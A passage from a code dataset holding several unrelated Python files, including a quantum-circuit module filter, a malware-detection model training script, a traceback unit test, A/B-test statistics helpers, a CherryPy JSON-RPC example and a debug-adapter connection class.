OUTPUT_MERGED_TARGET)\n","sub_path":"src/OMG_challenge/preprocessing_PRETRAININGdataset.py","file_name":"preprocessing_PRETRAININGdataset.py","file_ext":"py","file_size_in_byte":9233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"178798368","text":"from typing import List, Optional\n\nfrom QCompute import UnrollCircuitModule, CompressGateModule\n\nfrom QCompute.OpenModule import ModuleImplement\nfrom QCompute.QPlatform import BackendName, Error\n\n\ndef filterModule(backendName: Optional[str], moduleList: List['ModuleImplement']) \\\n -> List['ModuleImplement']:\n if backendName is None:\n return moduleList\n\n if backendName in [\n BackendName.LocalBaiduSim2.value,\n \n ]:\n return _filterSimulator(backendName, moduleList)\n \n else:\n return moduleList\n\n\ndef _filterSimulator(backendName: str, moduleList: List['ModuleImplement']) -> List['ModuleImplement']:\n unrollCircuitModule = None # type: Optional[UnrollCircuitModule]\n compressGateModule = None # type: Optional[CompressGateModule]\n ret = [] # type: List['ModuleImplement']\n for module in moduleList:\n \n if 
module.__class__.__name__ == 'UnrollCircuitModule':\n unrollCircuitModule = module\n elif module.__class__.__name__ == 'CompressGateModule':\n compressGateModule = module\n elif not module.disable:\n ret.append(module)\n if unrollCircuitModule is not None:\n if not unrollCircuitModule.disable:\n ret.append(unrollCircuitModule)\n else:\n ret.append(UnrollCircuitModule())\n if backendName not in [\n \n ]:\n if compressGateModule is not None:\n if not compressGateModule.disable:\n ret.append(compressGateModule)\n else:\n ret.append(CompressGateModule())\n return ret\n\n\n\n","sub_path":"QCompute/QPlatform/Processor/ModuleFilter.py","file_name":"ModuleFilter.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"524392632","text":"import os\nimport numpy as np\nfrom numpy import *\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom matplotlib import pyplot\nimport sys, math, joblib, gc\nfrom sklearn import preprocessing\nimport pickle\nfrom sklearn import metrics\nimport transform_helper as Transform \nfrom Model import Model\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, BatchNormalization, Activation\nfrom keras.optimizers import Adam\nimport tensorflow as tf\n\n\ndef repeat_softmax(X, y, preBuilt=False, model=None):\n\tX_train = X \n\ty_train = y\n\t\n\tif not preBuilt:\n\t\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=1)\n\t\t\n\t\tmodel = LogisticRegression(C=0.040980805223454236, tol=0.0037189066625450827, penalty='l2', max_iter=100,\n\t\t\t\t\t\t\t solver='newton-cg', warm_start=True)\n\t\n\t\n\ttrees = ExtraTreesClassifier(random_state=1)\n\ttrees.fit(X_train, y_train)\n\tselector = SelectFromModel(trees, prefit=True, threshold=-np.inf)\n\t\t\n\t#NEW X_TRAIN FROM SELECTED FEATURES:\n\tX_train = selector.transform(X_train)\n\n\t#standardize data\n\tX_train = preprocessing.StandardScaler().fit_transform(X_train)\n\t\n\tmodel.fit(X_train, y_train)\n\n\treturn model\n\ndef repeat_neural_network(X, y, preBuilt=False, model=None):\n\tX_train = X \n\ty_train = y\n\t\n\tif not preBuilt:\n\t\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=1)\n\t\t\n\t\tcols = X.shape[1]\n\t\tmodel = Sequential()\n\t\tmodel.add(Dense(100,input_dim=cols))\n\t\tmodel.add(Dropout(0.4))\n\t\tmodel.add(BatchNormalization())\n\t\tmodel.add(Activation('relu'))\n\t\tmodel.add(Dense(100))\n\t\tmodel.add(Dropout(0.4))\n\t\tmodel.add(BatchNormalization())\n\t\tmodel.add(Activation('relu'))\n\t\tmodel.add(Dense(1, activation='sigmoid'))\n\t\tmodel.compile(optimizer=Adam(lr=0.01), loss=\"binary_crossentropy\", metrics=[tf.keras.metrics.AUC()])\n\t\t\n\ttrees = ExtraTreesClassifier(random_state=1)\n\ttrees.fit(X_train, y_train)\n\tselector = SelectFromModel(trees, prefit=True, threshold=-np.inf)\n\t\n\t#NEW X_TRAIN FROM SELECTED FEATURES:\n\tX_train = selector.transform(X_train)\n\t\n\t#standardize data\n\tX_train = preprocessing.StandardScaler().fit_transform(X_train)\n\t\n\tmodel.fit(X_train, y_train)\n\t\n\treturn model\n\n\ndef evaluate_model(X, y, model, nn):\n\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=1)\n\t\n\ttrees = 
ExtraTreesClassifier(random_state=1)\n\ttrees.fit(X_train, y_train)\n\t\n\tselector = SelectFromModel(trees, prefit=True, threshold=-np.inf)\n\t\n\tX_test = selector.transform(X_test)\n\tX_test = preprocessing.StandardScaler().fit_transform(X_test) \n\t\n\tyhat = model.predict_proba(X_test)\n\tyhat = yhat[:, 1] if nn is False else yhat\n\t\n\tscore = metrics.roc_auc_score(y_test, yhat, average=None)\n\t\n\tprint(f\"\\nAUC Score: {score}\\n\")\n\t\n\nif __name__ == \"__main__\":\n\t\n\tMODEL_NUM = 1 # 1 - softmax, 2 - neural network\n\tTRAIN_CHUNKS = 0 # 0 - False, 1 - True\n\t\n\tmodel_dict = {\n\t\t1: 'softmax',\n\t\t2: 'neural_network',\n\t\t3: 'random_forest'\n\t}\n\t\n\tif len(sys.argv) > 2:\n\t\tMODEL_NUM = int(sys.argv[1])\n\t\tTRAIN_CHUNKS = int(sys.argv[2])\n\t\t\n\telif len(sys.argv) > 1:\n\t\tMODEL_NUM = int(sys.argv[1])\n\t\t\n\tdata_path = f'data{os.sep}'\n\ttrain_path = \"\"\n\t\n\ttrain_path = data_path + 'train.csv'\n\t\n\tdtypes = Transform.get_dtypes()\n\t\n\tprint('Reading from csv...')\n\t\n\ttrain_data = pd.read_csv(train_path, nrows=100000, dtype=dtypes)\n\t\n\tprint('Done\\n')\n\n\tytr = train_data[\"HasDetections\"].to_numpy()\n\t\n\tprint('Transforming Dataframe...')\n\t\n\ttrain_data = Transform.transform_dataframe(train_data)\n\t\n\ttrain_data = Transform.transform_categorical(train_data) # perform one-hot encoding on categorical columns\n\n\t# ONLY NEED FOR FULL NEURAL NETWORK \n\t# if os.path.isfile(\"test_submission2.csv\"):\n\t# \ttest_path = \"test_submission2.csv\"\n\t# \ttest_data = pd.read_csv(test_path, nrows=1)\n\t# \ttrain_data = Transform.make_matching_invert(train_data, test_data)\n\t\n\tlabels = list(train_data.columns)\n\t\n\ttmp_df = pd.DataFrame(columns=labels)\n\ttmp_df.to_csv('final_train.csv', index=False)\n\n\ttrain_data = train_data.drop(['MachineIdentifier', 'HasDetections'], axis=1) # drop unnecessary columns\n\t\n\tprint('Done\\n')\n\t\n\tprint('Training model...')\n\t\n\tselection = None\n\tmodel = None\n\t\n\tif TRAIN_CHUNKS == 1:\n\t\tXtr = train_data.to_numpy(dtype='float64')\n\t\tXtr = np.nan_to_num(Xtr)\n\t\t\n\t\t#Xtr_evaluator = np.copy(Xtr)\n\t\t\n\t\ttrain_chunks = Transform.split_dataframe(train_data, chunk_size=100000) # 100000\n\t\tytr_chunks = Transform.split_dataframe(ytr, chunk_size=100000)\n\t\t\n\t\tdel train_data \n\t\tgc.collect()\n\t\t\n\t\tlist_of_chunks = []\n\t\t\n\t\tfor i,chunk in enumerate(train_chunks):\n\t\t\tprint(f'Chunk #{i}')\n\t\t\tXtr = chunk.to_numpy(dtype='float64')\n\t\t\tXtr = np.nan_to_num(Xtr)\n \n\t\t\tif MODEL_NUM == 2:\n\t\t\t\tif i != 0:\n\t\t\t\t\tmodel = tf.keras.models.load_model('chunk_model_tf')\n\t \n\t\t\t\tmodel = repeat_neural_network(Xtr, ytr_chunks[i], i>0, model)\n\t\n\t\t\t\tmodel.save('chunk_model_tf', save_format='tf')\n\n\t\t\telse:\n\t\t\t\tmodel = repeat_softmax(Xtr, ytr_chunks[i], i > 0, model)\n \n\t\tdel Xtr, train_chunks, ytr_chunks\n\t\tgc.collect()\n \n\t\tprint('\\nEvaluating Model...')\n\t\t\n\t\t#evaluate_model(Xtr_evaluator, ytr, model, MODEL_NUM==2)\n\t\t \n\t\t\t\n\telse:\n\t\tXtr = train_data.to_numpy(dtype='float64')\n\t\tXtr = np.nan_to_num(Xtr)\n\t\n\t\tmodel = Model(Xtr, ytr, labels, MODEL_NUM)\n\t\t\n\t\tmodel = model.train_model()\n\t\n\t\n\tprint('Done\\n')\n\t\n\t# save the model to disk\n\tmodel_name = model_dict.get(MODEL_NUM)\n\t\n\tprint('Saving....\\n')\n\t\n\tif MODEL_NUM == 2:\n\t\tmodel_json = model.to_json()\n\t\n\t\twith open(f'saved_models{os.sep}model.json', 'w') as json_file:\n\t\t\tjson_file.write(model_json)\n\n\t\t# serialize the 
weights\n\tmodel.save_weights(f'saved_models{os.sep}model.h5')\n\t\t\n\telse:\n\t\tfilename = f'saved_models{os.sep}model.sav'\n\t\tjoblib.dump(model, filename)\n\t\n\tf = open('model_num.pckl', 'wb')\n\tpickle.dump(MODEL_NUM, f)\n\tf.close()\n\t\n\tprint(f'{model_name} model saved')\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"3519646","text":"\"\"\"In this file, we test to ensure that the output of\ncheck_syntax is as expected.\n\nWe also test to ensure that check_syntax does not accidentally\nchange any existing error handling settings.\n\n\"\"\"\n\nimport friendly_traceback as friendly\n\n\ndef test_check_syntax():\n # set-up\n bad_code_syntax = \"True = 1\"\n bad_code_exec = \"a = b\" # Not a syntax error, but a NameError\n good_code = \"c = 1\"\n\n friendly.set_stream(\"capture\")\n original_verbosity = friendly.get_verbosity()\n installed = friendly.is_installed()\n # ----- end of set-up\n\n # When a SyntaxError is raised, check_syntax returns False\n\n assert not friendly.advanced_check_syntax(source=bad_code_syntax)\n result = friendly.get_output() # content is flushed\n assert \"Python exception\" in result\n assert \"SyntaxError\" in result\n\n assert not friendly.get_output() # confirm that content was flushed\n\n # When no SyntaxError is raised, check_syntax returns a tuple\n # containing a code object and a file name\n assert friendly.advanced_check_syntax(source=bad_code_exec)\n assert friendly.advanced_check_syntax(source=good_code)\n assert not friendly.get_output() # no new exceptions recorded\n\n try:\n exec(bad_code_syntax, {})\n except Exception:\n assert not friendly.get_output()\n\n # When friendly-traceback is not installed, a call to check_syntax\n # will end with verbosity set to 0, which corresponds to normal Python\n # tracebacks\n friendly.uninstall()\n friendly.advanced_check_syntax(source=bad_code_syntax)\n assert friendly.get_verbosity() == 0\n friendly.advanced_check_syntax(source=bad_code_syntax, verbosity=4)\n assert friendly.get_verbosity() == 0\n\n # When friendly-traceback is \"installed\", a call to check_syntax\n # leaves its verbosity unchanged.\n friendly.install(redirect=\"capture\")\n\n friendly.set_verbosity(3)\n friendly.advanced_check_syntax(source=bad_code_syntax)\n assert friendly.get_verbosity() == 3\n friendly.advanced_check_syntax(source=bad_code_syntax, verbosity=4)\n assert friendly.get_verbosity() == 3\n\n # A call to advanced_check_syntax, with a language specified as an argument\n # should leave the previous language unchanged.\n\n friendly.set_lang(\"en\")\n assert not friendly.advanced_check_syntax(source=bad_code_syntax, lang=\"fr\")\n result = friendly.get_output()\n assert \"Exception Python\" in result # French heading\n assert friendly.get_lang() == \"en\"\n\n # Clean up and restore for other tests\n friendly.get_output()\n friendly.set_stream(None)\n if installed:\n friendly.uninstall()\n friendly.set_verbosity(original_verbosity)\n\n\nif __name__ == \"__main__\":\n test_check_syntax()\n print(\"Success!\")\n","sub_path":"tests/unit/test_check_syntax.py","file_name":"test_check_syntax.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"493786579","text":"import jieba\nimport re\nimport os\nimport tool.expand_tool as expand_tool\n\n# Create the stop-word list\ndef 
stopwordslist():\n stopwords = [line.strip() for line in open(\"tool\" + os.sep + 'baidu_stopwords.txt', encoding='UTF-8').readlines()]\n return stopwords\n\n\ndef cut_text(input_str):\n cut_list = jieba.cut(input_str, cut_all=False)\n #res_list = [c1 for c1 in cut_list if c1 not in stop_words]\n return cut_list\n\n\ndef do_judge_type(question, hint):\n hint = ' '.join(hint)\n hint = expand_tool.remove_symbol(hint)\n question = expand_tool.remove_symbol(question)\n if len(hint) > len(question):\n if question in hint:\n return ['A']\n else:\n if hint in question:\n return ['A']\n return ['B']\n\ndef do_muti_selection(selections,question_content,hint):\n hint = ' '.join(hint)\n sel_list = []\n letters = ['A','B','C','D','E','F']\n count = find_continue_blank_count(question_content)\n if len(selections) == count:\n for i in range(count):\n sel_list.append(letters[i])\n return sel_list\n for i in range(len(selections)):\n if expand_tool.remove_symbol(selections[i]) in hint:\n sel_list.append(letters[i])\n if len(sel_list) < count:#not enough options were matched, pad with unused letters\n n1 = count - len(sel_list)\n t1 = 0\n for let in letters:\n if let not in sel_list and t1 < n1:\n sel_list.append(let)\n t1 += 1\n\n return sel_list\n\ndef do_single_selection(selections, question_content, hint_text):\n hint_text = ''.join(hint_text)\n hint_text = expand_tool.remove_symbol(hint_text)\n ratio = [0]*len(selections)\n res_list = []\n letters = ['A', 'B', 'C', 'D', 'E', 'F']\n\n #true/false question\n if expand_tool.remove_symbol(selections[0]) == \"正确\" and expand_tool.remove_symbol(selections[1]) == \"错误\":\n res_list = do_judge_type(question_content,hint_text)\n return res_list\n\n #inverse-selection question\n in_count = 0\n out_index = 0\n for i in range(len(selections)):\n if selections[i] in hint_text:\n ratio[i] = 1\n in_count += 1\n else:\n out_index = i\n if in_count == len(selections)-1:#all options but one appear in the hint, so the question is inverted: pick the one that is missing\n res_list = [letters[out_index]] #use the tracked index of the option absent from the hint\n return res_list\n\n\n\n for m in range(len(selections)):\n if len(selections[m]) > len(hint_text):\n short_str = hint_text\n long_str = selections[m]\n else:\n short_str = selections[m]\n long_str = hint_text\n short_str = expand_tool.remove_symbol(short_str)\n long_str = expand_tool.remove_symbol(long_str)\n match_length = 0\n for i in range(len(short_str)):\n if short_str[i] in long_str:\n match_length += 1\n ratio[m] = match_length\n max_value = 0\n max_index = 0\n for i in range(len(ratio)):\n if ratio[i] > max_value:\n max_value = ratio[i]\n max_index = i\n res_list.append(letters[max_index])\n return res_list\n\n\ndef find_continue_blank_count(msg):\n pattern = r'()'\n res = re.findall(pattern,msg)\n return len(res)\n\ndef test():\n str = \"今天烟台很多地方下了雪,包括 、 、和 。haiyou \"\n find_continue_blank_count(str)\n\n#stop_words = stopwordslist()\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"SourcePackages/tool/SemanticAnalyze.py","file_name":"SemanticAnalyze.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"405920914","text":"import numpy as np\nimport scipy as sp\nimport scipy.stats #needed so sp.stats resolves (scipy does not import its submodules automatically)\n\n#frequentist\ndef proportion_test(c1, c2, n1, n2, mode = 'two_sided'):\n p = (c1+c2) / (n1+n2)\n p1 = c1 / n1\n p2 = c2 / n2\n z = (p1-p2) / np.sqrt(p*(1-p)*(1/n1 + 1/n2))\n if mode=='two_sided':\n p = 2*(1-sp.stats.norm.cdf(abs(z)))\n elif mode=='one_sided':\n p = 1-sp.stats.norm.cdf(abs(z))\n else:\n raise ValueError('Available modes are `one_sided` and `two_sided`')\n return z, p\n\ndef proportion_ci(c,n, p_value=0.05):\n p = c/n\n se = 
np.sqrt(p*(1-p)/n)\n z = sp.stats.norm.ppf(1-p_value/2)\n return p-z*se, p, p+z*se\n\n#bayesian\ndef sample_proportion(c,n,a=1,b=1,sim_size=100000): \n return np.random.beta(c+a,n-c+b,sim_size)\n\ndef proportion_test_b(c1,c2,n1,n2,a1=1,a2=1,b1=1,b2=1,sim_size=100000):\n p1 = sample_proportion(c1,n1,a1,b1,sim_size)\n p2 = sample_proportion(c2,n2,a2,b2,sim_size)\n return (p1 > p2).mean()\n\ndef proportion_ratio(c1,c2,n1,n2,a1=1,a2=1,b1=1,b2=1,sim_size=100000):\n p1 = sample_proportion(c1,n1,a1,b1,sim_size)\n p2 = sample_proportion(c2,n2,a2,b2,sim_size)\n return p1/p2\n\ndef proportion_ci_b(c1,c2,n1,n2,p_value=0.05,a1=1,a2=1,b1=1,b2=1,sim_size=100000):\n ratios = proportion_ratio(c1,c2,n1,n2,a1,a2,b1,b2,sim_size)\n return np.quantile(ratios,[p_value/2,1-p_value/2])\n\ndef value_remaining(c1,c2,n1,n2,q=95,sim_size=100000,a1=1,a2=1,b1=9,b2=9):\n p1 = sample_proportion(c1,n1,a1,b1,sim_size)[:,None]\n p2 = sample_proportion(c2,n2,a2,b2,sim_size)[:,None]\n p = np.concatenate([p1,p2],1)\n p_max = p.max(1)\n best_idx = np.argmax([p1.mean(),p2.mean()])\n p_best = p[:,best_idx]\n vs = (p_max-p_best)/p_best\n return np.percentile(vs,q)","sub_path":"stat_tests.py","file_name":"stat_tests.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"407145718","text":"import cherrypy\nimport simplejsonrpc\n\nimport methods\n\nsimplejsonrpc.registry.register_method('multiply', methods.multiply)\nsimplejsonrpc.registry.register_method('shlex', methods.shlex)\n\n# from http://tools.cherrypy.org/wiki/DirectToDiskFileUpload\ndef noBodyProcess():\n \"\"\"Sets cherrypy.request.process_request_body = False, giving\n us direct control of the file upload destination. By default\n cherrypy loads it to memory, we are directing it to disk.\"\"\"\n cherrypy.request.process_request_body = False\n\ncherrypy.tools.noBodyProcess = cherrypy.Tool('before_request_body', noBodyProcess)\n\nclass JsonRpcService:\n \"\"\" Request handler for JSON-RPC requests. 
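Body processing is disabled by the noBodyProcess tool, so index()\n reads the raw POST payload itself and hands it to simplejsonrpc's\n RequestHandler together with the handle_response callback.\n 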
\"\"\"\n\n exposed = True\n\n def __init__(self):\n self.handler = simplejsonrpc.handler.RequestHandler()\n\n def handle_response(self, status, response_headers):\n cherrpy.response.status = status\n cherrpy.response.headers.update(response_headers)\n\n @cherrypy.expose\n @cherrypy.tools.noBodyProcess()\n def index(self, **whatever):\n return self.handler.handle_request(\n cherrypy.request,\n cherrypy.request.body.fp.read(),\n self.handle_response)\n\nif __name__ == '__main__':\n cherrypy.quickstart(JsonRpcService())\n","sub_path":"examples/cherrpy.py","file_name":"cherrpy.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254589238","text":"# SilNet is referenced from U-Net segmentation.\n# It used three 2-strided convolutions and three deconvolutions.\nimport cv2\nimport os\nfrom keras.optimizers import Adam\nfrom keras.layers import *\nfrom keras.models import Model\n\nfrom GeoConGAN.SilNet.unet.data import *\n\nfrom PIL import Image\n\n\nresult_path = \"./unet/data/result\"\n\n\nclass DataLoader:\n def __init__(self, batch_size, paths):\n self.batch_size = batch_size\n self.paths = paths\n self.n_batch = 0\n self.load_path()\n\n def load_path(self):\n self.path_trainA = os.listdir(self.paths[0])\n self.path_trainB = os.listdir(self.paths[1])\n\n self.path_testA = os.listdir(self.paths[2])\n self.path_testB = os.listdir(self.paths[3])\n\n print(self.path_trainA)\n print(self.path_trainB)\n print(self.path_testA)\n print(self.path_testB)\n\n def data_load(self, is_train=True):\n\n if is_train:\n path_a = self.path_trainA\n path_b = self.path_trainB\n root_a = self.paths[0]\n root_b = self.paths[1]\n\n else:\n path_a = self.path_testA\n path_b = self.path_testB\n root_a = self.paths[2]\n root_b = self.paths[3]\n\n\n self.n_batch = int(min(len(path_a)//self.batch_size, len(path_b)//self.batch_size))\n\n #idx = np.random.choice(self.n_batch*self.batch_size, self.n_batch*self.batch_size, replace=False)\n\n for n in range(self.n_batch):\n imgs_A = []\n imgs_B = []\n for i in range(self.batch_size):\n img_A = imread(os.path.join(root_a, path_a[n*self.batch_size + i]))\n img_B = imread(os.path.join(root_b, path_b[n*self.batch_size + i]))\n\n imgs_A.append(img_A)\n imgs_B.append(img_B)\n\n imgs_A = np.array(imgs_A)/127.5 - 1\n imgs_B = np.array(imgs_B)/127.5 - 1\n\n yield imgs_A, imgs_B\n\n\ndef imread(path):\n image = np.array(Image.open(path))\n if image.shape[0] == 512:\n image.resize((256,256,1))\n\n image = image.reshape((256,256,1))\n return image\n\n\nclass SilNet:\n\n def __init__(self, shape, train_generator, data_loader, batch_size):\n self.shape = shape\n self.model = self.make_model2()\n self.compile_model()\n self.train_generator = train_generator\n self.test_generator = data_loader\n self.batch_size = batch_size\n\n def make_model(self):\n def normalization():\n return BatchNormalization()\n def conv(input_layer, filter):\n c = Conv2D(filters=filter, kernel_size=3, strides=1, padding='same')(input_layer)\n a = ReLU()(c)\n n = normalization()(a)\n c = Conv2D(filters=filter, kernel_size=3, strides=2, padding='same')(n)\n return c\n def resnet(input_layer, filter):\n n = normalization()(input_layer)\n a = ReLU()(n)\n c = Conv2D(filters=filter, kernel_size=5, strides=1, padding='same')(a)\n n = normalization()(c)\n a = ReLU()(n)\n c = Conv2D(filters=filter, kernel_size=5, strides=1, padding='same')(a)\n return Add()([input_layer, c])\n\n def deconv2d(input_layer, filter, concat):\n 
upsample = UpSampling2D(size=2)(input_layer)\n merge = concatenate([upsample,concat],axis=3)\n conv2d_layer = Conv2D(filters=filter, kernel_size=3, strides=1, padding='same')(merge)\n n = normalization()(conv2d_layer)\n return n\n filter_size = 64\n input_layer = Input(self.shape)\n\n\n conv_layer_1 = Conv2D(filters=filter_size, kernel_size=3, strides=1, padding='same')(input_layer)\n a = ReLU()(conv_layer_1)\n n = normalization()(a)\n conv_layer_2 = Conv2D(filters=filter_size, kernel_size=3, strides=2, padding='same')(n)\n a = ReLU()(conv_layer_2)\n n = normalization()(a)\n\n conv_layer_3 = Conv2D(filters=filter_size*2, kernel_size=3, strides=1, padding='same')(n)\n a = ReLU()(conv_layer_3)\n n = normalization()(a)\n conv_layer_4 = Conv2D(filters=filter_size*2, kernel_size=3, strides=2, padding='same')(n)\n\n res_net = resnet(conv_layer_4, filter_size*2)\n for i in range(0, 5):\n res_net = resnet(res_net, filter_size*2)\n\n deconv_1 = deconv2d(res_net, filter_size*2, conv_layer_3)\n deconv_2 = deconv2d(deconv_1, filter_size, conv_layer_1)\n\n output_layer = Conv2D(filters=1, kernel_size=1, strides=1, padding='same', activation='tanh')(deconv_2)\n\n return Model(inputs=input_layer, outputs=output_layer)\n\n def compile_model(self):\n self.model.compile(optimizer=Adam(lr=1e-4), loss='binary_crossentropy', metrics=['accuracy'])\n\n def train_on_batch(self, epoch):\n for epoch_idx in range(0, epoch):\n## for idx, (input_image, label) in enumerate(self.data_loader.data_load()):\n## loss = self.model.train_on_batch(input_image, label)\n loss = self.model.fit_generator(self.train_generator, steps_per_epoch=300, epochs=5)\n\n print(loss)\n self.test_save(epoch_idx)\n\n def make_model2(self):\n def normalize_layer():\n return BatchNormalization()\n\n filters = 64\n input_layer = Input(self.shape)\n c1 = Conv2D(filters=filters, kernel_size=3, padding='same',strides=1, activation='relu')(input_layer)\n n = normalize_layer()(c1)\n c1 = Conv2D(filters=filters, kernel_size=3, padding='same',strides=1, activation='relu')(n)\n n = normalize_layer()(c1)\n c1_d = Conv2D(filters=filters, kernel_size=3, padding='same',strides=2, activation='relu')(n)\n n = normalize_layer()(c1_d)\n# max_pool = MaxPooling2D()(n)\n\n c2 = Conv2D(filters=filters*2, kernel_size=3, padding='same',strides=1, activation='relu')(n)\n n = normalize_layer()(c2)\n c2 = Conv2D(filters=filters*2, kernel_size=3, padding='same',strides=1, activation='relu')(n)\n n = normalize_layer()(c2)\n c2_d = Conv2D(filters=filters*2, kernel_size=3, padding='same',strides=2, activation='relu')(n)\n n = normalize_layer()(c2_d)\n# max_pool = MaxPooling2D()(n)\n\n c3 = Conv2D(filters=filters*4, kernel_size=3, padding='same', strides=1, activation='relu')(n)\n n = normalize_layer()(c3)\n c3 = Conv2D(filters=filters*4, kernel_size=3, padding='same', strides=1, activation='relu')(n)\n\n up_sample = concatenate([Conv2DTranspose(filters=filters*2, kernel_size=2,strides=2,padding='same')(c3), c2],axis=3)\n\n c4 = Conv2D(filters=filters*2, kernel_size=3, padding='same', strides=1, activation='relu')(up_sample)\n n = normalize_layer()(c4)\n c4 = Conv2D(filters=filters*2, kernel_size=3, padding='same', strides=1, activation='relu')(n)\n\n up_sample = concatenate([Conv2DTranspose(filters=filters, kernel_size=2,strides=2,padding='same')(c4), c1],axis=3)\n\n\n c5 = Conv2D(filters=filters, kernel_size=3, padding='same', strides=1, activation='relu')(up_sample)\n n = normalize_layer()(c5)\n c5 = Conv2D(filters=filters, kernel_size=3, padding='same', strides=1, 
activation='relu')(n)\n\n output = Conv2D(filters=1, kernel_size=1, padding='same',strides=1, activation='tanh')(c5)\n\n return Model(inputs=input_layer, outputs=output)\n\n def test_save(self, epoch_idx):\n os.makedirs(result_path+\"/{0}\".format(epoch_idx), exist_ok=True)\n\n for i, (image, label) in enumerate(self.test_generator.data_load(False)):\n\n results = self.model.predict(image)\n\n results = (results + 1) * 127.5\n\n for b in range(self.batch_size):\n result = np.asarray(results[b], dtype=np.uint8)\n save_path = result_path+\"/{0}/result_{1}.png\".format(epoch_idx, i*self.batch_size+b)\n\n result = cv2.cvtColor(result,cv2.COLOR_GRAY2RGB)\n result = cv2.cvtColor(result,cv2.COLOR_RGB2GRAY)\n cv2.imwrite(save_path, result)\n '''\n result_image = Image.fromarray(result)\n result_image.save(result_path+\"/{0}/result_{1}.png\".format(epoch_idx, i*self.batch_size+b))\n '''\n\nif __name__ == \"__main__\":\n paths = [\n \"./unet/data/train/input\",\n \"./unet/data/train/label\",\n \"./unet/data/test/input\",\n \"./unet/data/test/label\"\n ]\n\n data_gen_args = dict(rotation_range=0.2,\n width_shift_range=0.05,\n height_shift_range=0.05,\n shear_range=0.05,\n zoom_range=0.05,\n horizontal_flip=True,\n fill_mode='nearest',\n validation_split=0.2)\n data_loader = DataLoader(batch_size=4, paths=paths)\n\n myGene = trainGenerator(4,'./unet/data/train','input','label',data_gen_args,save_to_dir = None)\n silnet = SilNet((256,256,1), myGene, data_loader, 4)\n silnet.model.summary()\n silnet.train_on_batch(500)\n","sub_path":"GeoConGAN/SilNet/silnet.py","file_name":"silnet.py","file_ext":"py","file_size_in_byte":9124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"433479613","text":"# vimspector - A multi-language debugging system for Vim\n# Copyright 2018 Ben Jackson\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport json\n\nfrom collections import namedtuple\n\nfrom vimspector import utils\n\nPendingRequest = namedtuple( 'PendingRequest',\n [ 'msg', 'handler', 'failure_handler' ] )\n\n\nclass DebugAdapterConnection( object ):\n def __init__( self, handler, send_func ):\n self._logger = logging.getLogger( __name__ )\n utils.SetUpLogging( self._logger )\n\n self._Write = send_func\n self._SetState( 'READ_HEADER' )\n self._buffer = bytes()\n self._handler = handler\n self._next_message_id = 0\n self._outstanding_requests = {}\n\n def DoRequest( self, handler, msg, failure_handler=None ):\n this_id = self._next_message_id\n self._next_message_id += 1\n\n msg[ 'seq' ] = this_id\n msg[ 'type' ] = 'request'\n\n self._outstanding_requests[ this_id ] = PendingRequest( msg,\n handler,\n failure_handler )\n self._SendMessage( msg )\n\n def Reset( self ):\n self._Write = None\n self._handler = None\n\n def OnData( self, data ):\n data = bytes( data, 'utf-8' )\n # self._logger.debug( 'Received ({0}/{1}): {2},'.format( type( data ),\n # len( data ),\n # data ) )\n\n self._buffer += data\n\n while True:\n if 
self._state == 'READ_HEADER':\n data = self._ReadHeaders()\n\n if self._state == 'READ_BODY':\n self._ReadBody()\n else:\n break\n\n if self._state != 'READ_HEADER':\n # We ran out of data whilst reading the body. Await more data.\n break\n\n def _SetState( self, state ):\n self._state = state\n if state == 'READ_HEADER':\n self._headers = {}\n\n def _SendMessage( self, msg ):\n msg = json.dumps( msg )\n self._logger.debug( 'Sending Message: {0}'.format( msg ) )\n\n data = 'Content-Length: {0}\\r\\n\\r\\n{1}'.format( len( msg ), msg )\n # self._logger.debug( 'Sending: {0}'.format( data ) )\n self._Write( data )\n\n def _ReadHeaders( self ):\n parts = self._buffer.split( bytes( '\\r\\n\\r\\n', 'utf-8' ), 1 )\n\n if len( parts ) > 1:\n headers = parts[ 0 ]\n for header_line in headers.split( bytes( '\\r\\n', 'utf-8' ) ):\n if header_line.strip():\n key, value = str( header_line, 'utf-8' ).split( ':', 1 )\n self._headers[ key ] = value\n\n # Chomp (+4 for the 2 newlines which were the separator)\n # self._buffer = self._buffer[ len( headers[ 0 ] ) + 4 : ]\n self._buffer = parts[ 1 ]\n self._SetState( 'READ_BODY' )\n return\n\n # otherwise waiting for more data\n\n def _ReadBody( self ):\n try:\n content_length = int( self._headers[ 'Content-Length' ] )\n except KeyError:\n # Ug oh. We seem to have all the headers, but no Content-Length\n # Skip to reading headers. Because, what else can we do.\n self._logger.error( 'Missing Content-Length header in: {0}'.format(\n json.dumps( self._headers ) ) )\n self._buffer = bytes( '', 'utf-8' 